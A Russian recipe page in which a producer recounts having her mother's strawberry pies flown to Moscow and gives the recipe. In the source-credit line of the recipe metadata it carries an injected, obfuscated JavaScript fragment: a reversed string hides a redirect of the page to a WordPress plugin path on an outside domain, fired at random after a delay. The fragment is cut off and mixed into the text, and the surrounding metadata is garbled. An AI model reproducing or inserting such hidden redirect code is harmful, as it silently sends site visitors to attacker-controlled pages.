Сооснователь «Спортивной секции» и продюсер бюро «Рабочее название» Елена Власова делится рецептом любимого маминого пирога, ради которого она готова даже лететь на завтрак в другой город.
Елена Власова
Елена Власова
сооснователь «Спортивной секции», продюсер Бюро «Рабочее название»
— Когда начинается сезон клубники и земляники, моя мама по выходным готовит самые вкусные на свете пироги, которые лучше всего запивать свежим деревенским молоком. Родители живут в другом городе, поэтому, к сожалению, мне не всегда удаётся попасть на семейные завтраки. Но однажды, узнав о новой партии этих пирогов, я через соцсети нашла человека, который как раз летел из Самары в Москву, и попросила захватить с собой ценнейший для меня груз. В благодарность за доставку я раскрыла секрет посылки и поделилась лакомым кусочком, после чего «почтальон» отметил, что если бы знал о содержимом посылки, то придумал бы, что она потерялась.
Мамины пироги с ягодами
Фото: whiteapronblog.com
Пирог с ягодами: рецепт от Елены Власовой
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
50 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4—6 порций
КАЛОРИЙНОСТЬ:
300—350 кКал
300 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Мука
4 стакана
Ягоды (клубника, земляника)
по вкусу
Сливочное масло
180—200 г
Растительное масло
130 мл
Вода
70 мл
Сода
1 щепотка
Соль
1 щепотка
- Приготовьте песочное тесто. Для этого растопите 180—200 г сливочного масла, добавьте 4 стакана муки, щепотку соли и соды, ⅓ стакана воды, ⅔ стакана растительного масла. Хорошо перемешайте до однородной консистенции.
- Раскатайте тесто — можно сделать большие круги диаметром 30 см каждый, а можно маленькие порционные пироги. Затем добавьте начинку — свежую клубнику и землянику, присыпьте их небольшим количеством сухого киселя и сахара (или фруктозы) и запечатайте пирог, тщательно скручивая и слепляя края.
- При помощи вилки оставьте следы в тесте, чтобы начинка не вытекала, и, разогрев духовку до 180—200 градусов, отправьте в неё пироги на предварительно смазанном маслом противне на 30 минут.
ПАСТА С ЛОСОСЕМ: РЕЦЕПТ ОТ ЕКАТЕРИНЫ ЧУПАХИНОЙ
ВОСКРЕСНЫЙ БРАНЧ: РЕЦЕПТ ОТ АНАСТАСИИ ГОДУНОВОЙ